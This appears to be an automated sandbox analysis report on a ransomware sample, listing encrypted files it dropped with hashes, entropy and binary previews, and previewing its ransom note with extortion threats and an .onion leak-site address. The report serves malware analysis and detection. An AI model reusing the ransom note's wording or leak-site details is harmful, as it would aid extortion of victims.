.d.9..3...Y.v3.\......(.s..........#.Ut.s.G*E....b...;.Jh....r3.......=Ar..}.G..K.Y..4S...M.J6P..O].....V.#B{..n..k.Q....,....,C..5.....s.+.ng...}..SM1b...]!.^.p.nc...l..l......$.C...A."{oSn-..8....am.^.......=\|V.T3G..j....v+.-.../..'........'....RJ..a.W.=#........w.i5H..^....L....$...H...:....M.x.=.(......l...Y...Wu....n.&Ai..W.....NL....-.8M.L....T..\|.....M.~...am......$j.U..JUX..@AX.O......C.`

C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980161631072431
Encrypted:	false
SSDEEP:	192:pEdRyPyw2SYVE70i+VoLln0wfAbk0p5YyslZ4ssYgbhGhcGzDzV+n:pEdRyPyPSYVE7oiln055Y9Z4sNgbhog
MD5:	9C7AC54E8AA5E8BC3A4B8A6FAF95C9A7
SHA1:	43944AB7AB31CFA29C0CA9D602D9365C41E69F40
SHA-256:	A96C157D9AF7576380653BAE7D61B61A8E7D0A05EACA7C55343466D2C82ABC46
SHA-512:	0C50BF89965C36F8542DB0A9BAADCFDF175B3B1EF6A42002DF93F138336D491F5D8EBDB5090DEB45F256248EFD80EAE015C1EDCCEA97F285CFD0F58E9A81348B
Malicious:	false
Preview:	o.6..O.v.?u.->-.....\~0..m.T.K^,..z...R..."...S!......5.%..?b......V,...=.......C. DB.{....oz..[......rgw.4i......sd ...{.\g...P(.)........n4...{E..?o..V.F............x..Q.'.....0Y.hR...x......6......\|..3.oc.O39...C/....B.......M......O....t..uB.........l.N.3\&.!...../..c....O>t..p.+/L8....;`....IK.n...j.Qf.gh.,......8.(..........V....xh,v...W.S.1..s....8lL.-..........@.....[..<c....s.}8...<.....5.M/..3j:..&.=.C.K....aDtG..~#.....zG....+.......L.n.d.]&...z.M ...;.v...M).V^.xO.....3....AT..j6..?Q.#.....o..P....>.,..........X.R..U09.(r..3.-D....q.e.f.h.qz5.....T.....zn..c.....-..vyS.JR....mQ.vR........MjB..>M8nd..JDC..9..."..->.....k.W....SQ.P.....B..y.9.Us=VO<.X............`...MD@....g`..&)......M.>^.B\|.....M..^............4...?...e..x..........f....D.jV......n$.CY...2.....b..+z.!.,Ka..q..1252..........g....a......d....5nX5,;..a./.....E..l..q...(e2V.{...../..S....G.D..q...B..a.........6...f.....im..w.)sW..6t....2..].....s.=;........O

C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.980161631072431
Encrypted:	false
SSDEEP:	192:pEdRyPyw2SYVE70i+VoLln0wfAbk0p5YyslZ4ssYgbhGhcGzDzV+n:pEdRyPyPSYVE7oiln055Y9Z4sNgbhog
MD5:	9C7AC54E8AA5E8BC3A4B8A6FAF95C9A7
SHA1:	43944AB7AB31CFA29C0CA9D602D9365C41E69F40
SHA-256:	A96C157D9AF7576380653BAE7D61B61A8E7D0A05EACA7C55343466D2C82ABC46
SHA-512:	0C50BF89965C36F8542DB0A9BAADCFDF175B3B1EF6A42002DF93F138336D491F5D8EBDB5090DEB45F256248EFD80EAE015C1EDCCEA97F285CFD0F58E9A81348B
Malicious:	false
Preview:	o.6..O.v.?u.->-.....\~0..m.T.K^,..z...R..."...S!......5.%..?b......V,...=.......C. DB.{....oz..[......rgw.4i......sd ...{.\g...P(.)........n4...{E..?o..V.F............x..Q.'.....0Y.hR...x......6......\|..3.oc.O39...C/....B.......M......O....t..uB.........l.N.3\&.!...../..c....O>t..p.+/L8....;`....IK.n...j.Qf.gh.,......8.(..........V....xh,v...W.S.1..s....8lL.-..........@.....[..<c....s.}8...<.....5.M/..3j:..&.=.C.K....aDtG..~#.....zG....+.......L.n.d.]&...z.M ...;.v...M).V^.xO.....3....AT..j6..?Q.#.....o..P....>.,..........X.R..U09.(r..3.-D....q.e.f.h.qz5.....T.....zn..c.....-..vyS.JR....mQ.vR........MjB..>M8nd..JDC..9..."..->.....k.W....SQ.P.....B..y.9.Us=VO<.X............`...MD@....g`..&)......M.>^.B\|.....M..^............4...?...e..x..........f....D.jV......n$.CY...2.....b..+z.!.,Ka..q..1252..........g....a......d....5nX5,;..a./.....E..l..q...(e2V.{...../..S....G.D..q...B..a.........6...f.....im..w.)sW..6t....2..].....s.=;........O

C:\Users\user\Documents\GAOBCVIQIJ\QCFWYSKMHA.xlsx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977284422053082
Encrypted:	false
SSDEEP:	192:8qz8XYxaJg6Qekzm0UG220ERX8DM9V0PHl903YDjc7V+n:8Qoh5k/N0ERX8DaVslcY/c8
MD5:	B453139FB0F8F604A0DEA015277BD1AE
SHA1:	54FE0F980D58A4A4A8DD29A9EDE74EC15C38FBF7
SHA-256:	1165083D749CA698297396FED400A1FBECCCB7DE271301BDDE117167EFB413D5
SHA-512:	A4BB81F57E2C492F962563122EFFFC3B7B65B64DC176996C3EA09AE453890EAEFCB4136F03A2D9D6FB0C2FE390C7642F9B7BB691679F12E71243E0BFF04F5A09
Malicious:	false
Preview:	o..0.=..q`.....>....o.u..ee...G0..:g)A.\.....~.]g..d.m.EzVCo..&h.;t..C!.Kn.M!C\|%.......1.S...\|...P...".^.c...A8.....G.t.m..[w.. \|.)....'1do..Dr...8....$.f.M.F....._&.^\.i. .h@.2fA=.5.\..q.5%.n....^..=..o.o.X.h.........o[........e.)..I3...j J.9..?...H.'t..vdf.....W.R.....k.)...6...m...K.A...........B..>{.....:..n...?c...B......@..d...\...iq\|..#......'..3A.i...g.....]...t5v.Q..^.W.........X........i..h..M.wcl.$S%u..`F.I..`...`......RP...T....j...M...70w.<.....T..x.3......3..... ....1..W....i5...GH./..=...(..u..n2.BI.A.E9.....8.dg..[...2.N. ....a]G.~.Y.Q.I...T\.R.y....<B.D.....?..+.....R.......!>.....#v....b..i...Q;.,.SsV.u.y.........\|)z.?xk._...{...=..d.;,..).&..H./o...k...QP.H...C.2...p?F....!.e.G,!D.c.WRy.2..D..(...f{......<.0&..4.3.r..p...X.v....7W.......D..6~.7G.j2 ...?..o..#...u......Bd.t..:U$.H.N."........X....j.i.R..^..P...;..[...BFFk.]*.1.n ..h.....$.<....K^.....^=.....6.....@.e,.G f..0...r.c7..RN..=..+b(%....k.FE.P..'..^...

C:\Users\user\Documents\GAOBCVIQIJ\QCFWYSKMHA.xlsx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977284422053082
Encrypted:	false
SSDEEP:	192:8qz8XYxaJg6Qekzm0UG220ERX8DM9V0PHl903YDjc7V+n:8Qoh5k/N0ERX8DaVslcY/c8
MD5:	B453139FB0F8F604A0DEA015277BD1AE
SHA1:	54FE0F980D58A4A4A8DD29A9EDE74EC15C38FBF7
SHA-256:	1165083D749CA698297396FED400A1FBECCCB7DE271301BDDE117167EFB413D5
SHA-512:	A4BB81F57E2C492F962563122EFFFC3B7B65B64DC176996C3EA09AE453890EAEFCB4136F03A2D9D6FB0C2FE390C7642F9B7BB691679F12E71243E0BFF04F5A09
Malicious:	false
Preview:	o..0.=..q`.....>....o.u..ee...G0..:g)A.\.....~.]g..d.m.EzVCo..&h.;t..C!.Kn.M!C\|%.......1.S...\|...P...".^.c...A8.....G.t.m..[w.. \|.)....'1do..Dr...8....$.f.M.F....._&.^\.i. .h@.2fA=.5.\..q.5%.n....^..=..o.o.X.h.........o[........e.)..I3...j J.9..?...H.'t..vdf.....W.R.....k.)...6...m...K.A...........B..>{.....:..n...?c...B......@..d...\...iq\|..#......'..3A.i...g.....]...t5v.Q..^.W.........X........i..h..M.wcl.$S%u..`F.I..`...`......RP...T....j...M...70w.<.....T..x.3......3..... ....1..W....i5...GH./..=...(..u..n2.BI.A.E9.....8.dg..[...2.N. ....a]G.~.Y.Q.I...T\.R.y....<B.D.....?..+.....R.......!>.....#v....b..i...Q;.,.SsV.u.y.........\|)z.?xk._...{...=..d.;,..).&..H./o...k...QP.H...C.2...p?F....!.e.G,!D.c.WRy.2..D..(...f{......<.0&..4.3.r..p...X.v....7W.......D..6~.7G.j2 ...?..o..#...u......Bd.t..:U$.H.N."........X....j.i.R..^..P...;..[...BFFk.]*.1.n ..h.....$.<....K^.....^=.....6.....@.e,.G f..0...r.c7..RN..=..+b(%....k.FE.P..'..^...

C:\Users\user\Documents\GAOBCVIQIJ\SUAVTZKNFL.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979649468554294
Encrypted:	false
SSDEEP:	192:MR+H9Yir+NspacgK3uIOmCt2loxg2myG03JEHxetX+3XvnLhK5vVn8V+n:n9Zr+NsZ3uIWngAL3JEH++HvnLhY9nd
MD5:	B49252644CD82CCBB66A4D2CB4E488D7
SHA1:	57BADEE540580FF799258263F92D72555040BFF3
SHA-256:	13E148E94ECD364E288C744050BA78FC4E00CDDB1EDB60808FFD683EB507EC8F
SHA-512:	DA2DCD94D9FA760F9CB44CBD23526F0C8869D1BCED438981E3CE84D3E97C835FDB5F47942717786A2FF68ED9A4C7C66B29F977537FEDAB71C5107AD9484677F5
Malicious:	false
Preview:	..vX...y.. ON..?.;FL.b).Q...!{.B.pQ....g.1.\|..o ...W..F....&..L.d..\|......c.r.&.F.....x.q.3x.......\e.q.o.....}....M...G.Uf.DV...t...L+..`....y.K.YQ.T.]8.c..l...[..Hf5..u.j....W....v&+....Gg.H.Ak.z\|~.Ab{....&.u..`...n.()x...=).u....t..gf..._...m...C.xm....+sd.5s.3i%........jcn"Od..j..A..To...g...........BM.uE.Y\|t.....A.:.....o....:x..0U..=e..V....G......6f8...K3.$dP....o.(....C^.o.\3.N I.l...(.F.P._.m....;.N....D...J...?.;.pQ...gR0..I.&..'..I Y...H.C.!...'.L...(.y...O.\.V.T.=xJ.`..D..>,1....i.{....@....a.Q...A..S.p".)..=.....{..Y..t...=\.../........A...QX."9...D..D4$.!;.).$Ryj..x...X...R=..9N...._."....."v.......Q0GQ~...J..y.O..^....]...!~I....IC.j?......5.T.[.Qv#.J.h.=...@.2^...g....'....N.>./eY5..I6'....}....Q....k..=.o........yc..=....c...'......z.......q......;(.t!.r..v]....8.D.........$..\|..^.#%i.1h....v.......s...7....S8..D3O....g..JA..`..B.....D+.\|.&..y.T.-.^..x&...f.c.Q.X>....mV.<...R...*5(n.s#.k.Z=..n..v25(...

C:\Users\user\Documents\GAOBCVIQIJ\SUAVTZKNFL.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979649468554294
Encrypted:	false
SSDEEP:	192:MR+H9Yir+NspacgK3uIOmCt2loxg2myG03JEHxetX+3XvnLhK5vVn8V+n:n9Zr+NsZ3uIWngAL3JEH++HvnLhY9nd
MD5:	B49252644CD82CCBB66A4D2CB4E488D7
SHA1:	57BADEE540580FF799258263F92D72555040BFF3
SHA-256:	13E148E94ECD364E288C744050BA78FC4E00CDDB1EDB60808FFD683EB507EC8F
SHA-512:	DA2DCD94D9FA760F9CB44CBD23526F0C8869D1BCED438981E3CE84D3E97C835FDB5F47942717786A2FF68ED9A4C7C66B29F977537FEDAB71C5107AD9484677F5
Malicious:	false
Preview:	..vX...y.. ON..?.;FL.b).Q...!{.B.pQ....g.1.\|..o ...W..F....&..L.d..\|......c.r.&.F.....x.q.3x.......\e.q.o.....}....M...G.Uf.DV...t...L+..`....y.K.YQ.T.]8.c..l...[..Hf5..u.j....W....v&+....Gg.H.Ak.z\|~.Ab{....&.u..`...n.()x...=).u....t..gf..._...m...C.xm....+sd.5s.3i%........jcn"Od..j..A..To...g...........BM.uE.Y\|t.....A.:.....o....:x..0U..=e..V....G......6f8...K3.$dP....o.(....C^.o.\3.N I.l...(.F.P._.m....;.N....D...J...?.;.pQ...gR0..I.&..'..I Y...H.C.!...'.L...(.y...O.\.V.T.=xJ.`..D..>,1....i.{....@....a.Q...A..S.p".)..=.....{..Y..t...=\.../........A...QX."9...D..D4$.!;.).$Ryj..x...X...R=..9N...._."....."v.......Q0GQ~...J..y.O..^....]...!~I....IC.j?......5.T.[.Qv#.J.h.=...@.2^...g....'....N.>./eY5..I6'....}....Q....k..=.o........yc..=....c...'......z.......q......;(.t!.r..v]....8.D.........$..\|..^.#%i.1h....v.......s...7....S8..D3O....g..JA..`..B.....D+.\|.&..y.T.-.^..x&...f.c.Q.X>....mV.<...R...*5(n.s#.k.Z=..n..v25(...

C:\Users\user\Documents\GAOBCVIQIJ\uCLrcwQ_readme_.txt Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	3772
Entropy (8bit):	5.732394345207235
Encrypted:	false
SSDEEP:	48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69U:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USI
MD5:	4E2E4CDD33916285D0D97DE5AAB49E55
SHA1:	994BD5DD3D3ABA3685E3C42522DA92EF40E54BF0
SHA-256:	ADFA4D5515BC6793C4017CBE50F47FFF3BFF7644C2A1825F7989260346D99FDD
SHA-512:	582D0830ACCD5BD7BADC0D80B37F522C17912D02BD3E94A8DD3121E1E7A95A736FF1867281064EC51CB7B315ABE8CAF2C0818281443B89C3B75399D3A34EA038
Malicious:	false
Preview:	-------=== Your network has been infected! ===-------.........*************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------

C:\Users\user\Documents\LSBIHQFDVT.docx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977615054441206
Encrypted:	false
SSDEEP:	192:xUWaZDPVfyhbT1ZBmaexeb2sO985AhugyYfRJiMV+n:xUWaZxyhtaa2eb2sOyUusRcN
MD5:	55E9CC319B8BB92E419A6DA089EBAAC4
SHA1:	18CF2864775F86597F272929E31A3D50FCEEAC4B
SHA-256:	76608A8B6051957AC660C97581EC3E59569C55B28212058E08DC9903545F0866
SHA-512:	9490B7DA1410118E32D24A90769A29CE1997DBE4EF46A58A0BD96C5AF47416AEB6E0D0906FE8C80316BC79E95C1CAD2FC54084FA48F09E2BF0313A840BED4446
Malicious:	false
Preview:	r...S.Y.....py..[........)...`.BA..]~.......4.W.AD_....Oy!..IR\|..1.~.T...S...F..Z'...#....z{........W...y.\|R.....o\|;.I....#.X..6c..S.. @.g......."n.XP.....8`..Fi...?z..2.y..v..r.Sv...-.x.&wz..6.....P..sxr.....B..&-...:..pXZcka..Z'...>.[...(.Wl...+.v.g.48O.+m0.d.EY.h....R......,...#a.T..Pa..r.^..O.bMZ@..V.Vz..\..<.p...B.....}.8s.w=h?}W..{.^~.V...r..n....e.!.%....1v...xm.PC.}...<.M.......I...._...JM\...p..e..y."".;^!.Q..v.D)r..?....ceV2$...?,..x.]......9=p.w.0&../...n...>o....o77a<.)..h}.Of......;(R..'M..a...h{g.[w..p.{.....M........<.[....B...d:<Q.3..k66.:......x.$S.....e......oF...L...@..?.z$.+.g....1..BW;=..\|}.......`w...8;......kN=..Y..A3?.T9..ed.........\|.(..=..Dif.U.a\..M!.......b.S. .Ri..LL.!...."..68..._.W...n.Y.W......[..5...l%..`...f....~......jI.t.}...P.yQ.LKH.-.?D.\.P,.k=..+...&&...R...c.....L.....2.J..8.C^.o..E...1...q..\.*...^..uCl.....\.".t..).-[2r..12X.0e.....[./sQ.LJ.."......#...D..B.O....{.'..........>...lA....7.7

C:\Users\user\Documents\LSBIHQFDVT.docx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977615054441206
Encrypted:	false
SSDEEP:	192:xUWaZDPVfyhbT1ZBmaexeb2sO985AhugyYfRJiMV+n:xUWaZxyhtaa2eb2sOyUusRcN
MD5:	55E9CC319B8BB92E419A6DA089EBAAC4
SHA1:	18CF2864775F86597F272929E31A3D50FCEEAC4B
SHA-256:	76608A8B6051957AC660C97581EC3E59569C55B28212058E08DC9903545F0866
SHA-512:	9490B7DA1410118E32D24A90769A29CE1997DBE4EF46A58A0BD96C5AF47416AEB6E0D0906FE8C80316BC79E95C1CAD2FC54084FA48F09E2BF0313A840BED4446
Malicious:	false
Preview:	r...S.Y.....py..[........)...`.BA..]~.......4.W.AD_....Oy!..IR\|..1.~.T...S...F..Z'...#....z{........W...y.\|R.....o\|;.I....#.X..6c..S.. @.g......."n.XP.....8`..Fi...?z..2.y..v..r.Sv...-.x.&wz..6.....P..sxr.....B..&-...:..pXZcka..Z'...>.[...(.Wl...+.v.g.48O.+m0.d.EY.h....R......,...#a.T..Pa..r.^..O.bMZ@..V.Vz..\..<.p...B.....}.8s.w=h?}W..{.^~.V...r..n....e.!.%....1v...xm.PC.}...<.M.......I...._...JM\...p..e..y."".;^!.Q..v.D)r..?....ceV2$...?,..x.]......9=p.w.0&../...n...>o....o77a<.)..h}.Of......;(R..'M..a...h{g.[w..p.{.....M........<.[....B...d:<Q.3..k66.:......x.$S.....e......oF...L...@..?.z$.+.g....1..BW;=..\|}.......`w...8;......kN=..Y..A3?.T9..ed.........\|.(..=..Dif.U.a\..M!.......b.S. .Ri..LL.!...."..68..._.W...n.Y.W......[..5...l%..`...f....~......jI.t.}...P.yQ.LKH.-.?D.\.P,.k=..+...&&...R...c.....L.....2.J..8.C^.o..E...1...q..\.*...^..uCl.....\.".t..).-[2r..12X.0e.....[./sQ.LJ.."......#...D..B.O....{.'..........>...lA....7.7

C:\Users\user\Documents\LSBIHQFDVT\GAOBCVIQIJ.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.982227733320917
Encrypted:	false
SSDEEP:	192:LbWQ8a4CtPjwxcYPKyAuLLaIq4jQR0z8M+ZOhzt0+xV+n:LbWQacYPKBsNqUQRNM1z8
MD5:	F6CD6FE545AE7A38F19BCD79583A8FDF
SHA1:	D1A93CB613A18B06C5F5DC7B7CFDC6F775A86415
SHA-256:	7A74FC6D5C394B84BBCDE92D041D918864A1C55111874811E8A191B27D7BADEC
SHA-512:	6230B0C14EEEC93AA8CFB425BB510BC1D9F7FBDE2620E741297EF4A5AE3B6485788BF3CE981BC62442033E79572AB467CA0CA9D3FC5A25C51E4DCDB4A604EE1A
Malicious:	false
Preview:	4......F.NE.}.UAZh..WL..e...z.x..SQ..hn.H,.f:..]>@.Q./a....Lr.p..4M.....2>1.q..Z...N........\..RsI.X;.3cX... K.......yX-.!..T...W...,b\|!l...H......!.c.P..W.)._s.?..,.d@..o....P.."7C.....+j.:..z7L.qh).[.H..3...H..H.~...g.J.z)...#.p6y..+.h.\|....KQQ&'........}.iS.s.>.q...v.9].157....4.Y!\|V.F)4..$...)R..i.e.@..0u........JZ.Vd..s5....X.g...a.....}.c%..../!.D...TK....^7.%..f.s`..B.\|sh.rZ.:..q.^.t....b.a.....+..5.?..xDM.....&...<..w....p\.'j....7..7..GJ.`...q...5..K. ),...;-}.c..;...m.e.I9..b...V....eU...E/.6.Q..eM..<I.^,,..\|J>b..1.0..&B[....b.....D.M..'...IdQO..6..'.y<.lJ.a...k..=...O3`..i.O.^.O..~...C....uJ.........%....x...f.O..5.(s4...lUJ.e:w*e.m.../. ."(.{.').5.s....[:.l..L..$.{M:.:......b..._.Q..\|...G.....0.c,..qF9.B....$\|[.:En..m&.5b.y..~.....D.OO......7T..]....RS...uHEK.=)...sk..#g..mnU....$.....=...<.Wa.U^:..9g./.m....A..O....hP....R\|Pn...wx$u.. .......(..4..^z.P....<...U....u.i....`y..sp.>:.n}...Ze.r(..Y3.c...40.v.7_.$. 4.wj....p....

C:\Users\user\Documents\LSBIHQFDVT\GAOBCVIQIJ.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.982227733320917
Encrypted:	false
SSDEEP:	192:LbWQ8a4CtPjwxcYPKyAuLLaIq4jQR0z8M+ZOhzt0+xV+n:LbWQacYPKBsNqUQRNM1z8
MD5:	F6CD6FE545AE7A38F19BCD79583A8FDF
SHA1:	D1A93CB613A18B06C5F5DC7B7CFDC6F775A86415
SHA-256:	7A74FC6D5C394B84BBCDE92D041D918864A1C55111874811E8A191B27D7BADEC
SHA-512:	6230B0C14EEEC93AA8CFB425BB510BC1D9F7FBDE2620E741297EF4A5AE3B6485788BF3CE981BC62442033E79572AB467CA0CA9D3FC5A25C51E4DCDB4A604EE1A
Malicious:	false
Preview:	4......F.NE.}.UAZh..WL..e...z.x..SQ..hn.H,.f:..]>@.Q./a....Lr.p..4M.....2>1.q..Z...N........\..RsI.X;.3cX... K.......yX-.!..T...W...,b\|!l...H......!.c.P..W.)._s.?..,.d@..o....P.."7C.....+j.:..z7L.qh).[.H..3...H..H.~...g.J.z)...#.p6y..+.h.\|....KQQ&'........}.iS.s.>.q...v.9].157....4.Y!\|V.F)4..$...)R..i.e.@..0u........JZ.Vd..s5....X.g...a.....}.c%..../!.D...TK....^7.%..f.s`..B.\|sh.rZ.:..q.^.t....b.a.....+..5.?..xDM.....&...<..w....p\.'j....7..7..GJ.`...q...5..K. ),...;-}.c..;...m.e.I9..b...V....eU...E/.6.Q..eM..<I.^,,..\|J>b..1.0..&B[....b.....D.M..'...IdQO..6..'.y<.lJ.a...k..=...O3`..i.O.^.O..~...C....uJ.........%....x...f.O..5.(s4...lUJ.e:w*e.m.../. ."(.{.').5.s....[:.l..L..$.{M:.:......b..._.Q..\|...G.....0.c,..qF9.B....$\|[.:En..m&.5b.y..~.....D.OO......7T..]....RS...uHEK.=)...sk..#g..mnU....$.....=...<.Wa.U^:..9g./.m....A..O....hP....R\|Pn...wx$u.. .......(..4..^z.P....<...U....u.i....`y..sp.>:.n}...Ze.r(..Y3.c...40.v.7_.$. 4.wj....p....

C:\Users\user\Documents\LSBIHQFDVT\LSBIHQFDVT.docx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977936660904519
Encrypted:	false
SSDEEP:	192:0zOC6dAYBGsCaj06ouzzTGx22ayqj+p7J4FFPH358tzjSBV+n:0yC6BrCA0oXTG5ayqje7EkzjSe
MD5:	2720F41D41ED4BEEEEA24EF7904B8617
SHA1:	C3299ACC1E2715E0A9A694801788D171F6CAB20B
SHA-256:	F444AD80D0E27013BDE4615DB1FCD85ABA22AFC943CEDC7D7F2957B3DD5BCB32
SHA-512:	A7E3F2973B33ABC0B6C43FE82D301DE8D56DCFA3D5613B8C7A16AFCDB078842B52B315474631025BF0AA940162A11377849335FC93B709011E7CAE591169F5BD
Malicious:	false
Preview:	{f..i...lH..E...."Ea...,.J.<};.......UUH.Cu...........6... .af...;..~..u...Q.\|g...I.........S".....\\.!.k.3.$S:.....7.U.@....3....AS.........8..}.&..w....f.\.h..?.=;.Uy.....p..."..]._Ps......)1.i@in.k....e.$f.<?...f..{..hmg...<X.&. .[....x"....L..K..8..kc.P.(.....j.z.+.6.......k...v.....Fk....9M..THu......4..3p7.-...u.....I.(.z...Y..._.:..f3..j..R<..u...$..x..qd.wdtg.........?.9w....^W7/.+..Yw...'.}E.........W#........8k..#..l-.`......'.}u2......K.h\|.M3.p.\|............#.&..{cka#..0...'.ok.i..t.......wE...)H.....&6.bk..D..e..FDj....z.a_..]I.....eJo....$._._.s.P6-...r..?.\....jg..2..r.....h..7.3.3..sW...G.D.$.W...e.G{F.A.7f.'.....l..C.E..h]..../{....:..XHz..........'8'..../.`J.RI....a...\....U.7..H..}..S~.{}D.@....K...S...[>Sl. .g.B+....i..../.w.4.8..5..w...m(..e..{o..C..!;L!......b..)..o 5..x<.........d.S...y.!.].s-!.Ye.V.....(.mD-..oZ....U.=G.S.5.l.\|....().2...'5.....-V..m.....A....Zp.\RV...".sc8...=XB^.).....g3.&..2".....Fq...

C:\Users\user\Documents\LSBIHQFDVT\LSBIHQFDVT.docx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977936660904519
Encrypted:	false
SSDEEP:	192:0zOC6dAYBGsCaj06ouzzTGx22ayqj+p7J4FFPH358tzjSBV+n:0yC6BrCA0oXTG5ayqje7EkzjSe
MD5:	2720F41D41ED4BEEEEA24EF7904B8617
SHA1:	C3299ACC1E2715E0A9A694801788D171F6CAB20B
SHA-256:	F444AD80D0E27013BDE4615DB1FCD85ABA22AFC943CEDC7D7F2957B3DD5BCB32
SHA-512:	A7E3F2973B33ABC0B6C43FE82D301DE8D56DCFA3D5613B8C7A16AFCDB078842B52B315474631025BF0AA940162A11377849335FC93B709011E7CAE591169F5BD
Malicious:	false
Preview:	{f..i...lH..E...."Ea...,.J.<};.......UUH.Cu...........6... .af...;..~..u...Q.\|g...I.........S".....\\.!.k.3.$S:.....7.U.@....3....AS.........8..}.&..w....f.\.h..?.=;.Uy.....p..."..]._Ps......)1.i@in.k....e.$f.<?...f..{..hmg...<X.&. .[....x"....L..K..8..kc.P.(.....j.z.+.6.......k...v.....Fk....9M..THu......4..3p7.-...u.....I.(.z...Y..._.:..f3..j..R<..u...$..x..qd.wdtg.........?.9w....^W7/.+..Yw...'.}E.........W#........8k..#..l-.`......'.}u2......K.h\|.M3.p.\|............#.&..{cka#..0...'.ok.i..t.......wE...)H.....&6.bk..D..e..FDj....z.a_..]I.....eJo....$._._.s.P6-...r..?.\....jg..2..r.....h..7.3.3..sW...G.D.$.W...e.G{F.A.7f.'.....l..C.E..h]..../{....:..XHz..........'8'..../.`J.RI....a...\....U.7..H..}..S~.{}D.@....K...S...[>Sl. .g.B+....i..../.w.4.8..5..w...m(..e..{o..C..!;L!......b..)..o 5..x<.........d.S...y.!.].s-!.Ye.V.....(.mD-..oZ....U.=G.S.5.l.\|....().2...'5.....-V..m.....A....Zp.\RV...".sc8...=XB^.).....g3.&..2".....Fq...

C:\Users\user\Documents\LSBIHQFDVT\PWCCAWLGRE.png Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977788314831574
Encrypted:	false
SSDEEP:	192:HloZGTnxJgcNGahTt5ZfFJZsJmZNIqCJgU1Gpn/1CQW3sfQV+n:HloZeJHca9t/fNsWBE1A23sB
MD5:	CB2A95C84816B50531A368BA1FE5E38D
SHA1:	BB1746C18C67A847375DEE23BB874214E346D198
SHA-256:	8D329F8EC9688DDF73F40F8BACEFFE1D1404C2AA2C39805759B5D8BD5F90A29C
SHA-512:	FFA8A4216E1B4B6A33B0B8832D230F0C10D547180358341EA41F373F2A5394D7250F14FCB1DA0EA6A4A8F308A6B79DD334A50DFEE3BA71A4B9648F55907F68B0
Malicious:	false
Preview:	@....Sa.&..r=.xf.........qx......'.v2..S.9.."...S.Lv7`./$?..2..y.#.e...SBM;......!.^m...b.....=..=dG^.T...!.^...w..B.....vl..V....H..".b+.A..${C..b......z.,....Ki.\|.P.?....].iZ..r.?..j.k....d.......,...K.X..wL...u.ZtgD.v0..T.n...A..l1pO.{...\.p.$.A.U....0...h.rc..o.,;........Y...t..^.7^..^B9o..%../q3.+,P#.W.9.U...1...f4)5.:0.I.e.0.w..Z....yT..Z....&..f..4C0...............]@......{.`oM.5.A.fFG....._.>.....X..Ee.H(.b........J..q.{`.'.Y..H.....t.....{...F...?...q....20..B...n-..E..O..Uf.ofP...{.}n.c....V<..}G.(.x....C.\|...}X4....'.i^......7..i.4.-/n.h."..4.NJ.[`.70..6G...N.E...-.....N!#e.$..V.z...!a..&vs.V.F...'....1tJd.....F7z-GR.z2...?..(..P[.......Bn......KlS:8......e....B.O....[_.8..<....MQ.n...T..6....K_.W...O.....(..E4.k.d.....U..UpCH.._:..S...n..W.(._....I.......;.e.\|c[.'....vR.Zh..r..Z_.].t..~@,.....+.9vb.i.,....y'.AB.#wo..-e>..b........>;..&S.*.:.(31...5W.{.\|.6q.....'.d4J...rT..O$....;....n.lGX..V.z....;.......I.9rO...o.f.Q.7\|F.;..

C:\Users\user\Documents\LSBIHQFDVT\PWCCAWLGRE.png.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977788314831574
Encrypted:	false
SSDEEP:	192:HloZGTnxJgcNGahTt5ZfFJZsJmZNIqCJgU1Gpn/1CQW3sfQV+n:HloZeJHca9t/fNsWBE1A23sB
MD5:	CB2A95C84816B50531A368BA1FE5E38D
SHA1:	BB1746C18C67A847375DEE23BB874214E346D198
SHA-256:	8D329F8EC9688DDF73F40F8BACEFFE1D1404C2AA2C39805759B5D8BD5F90A29C
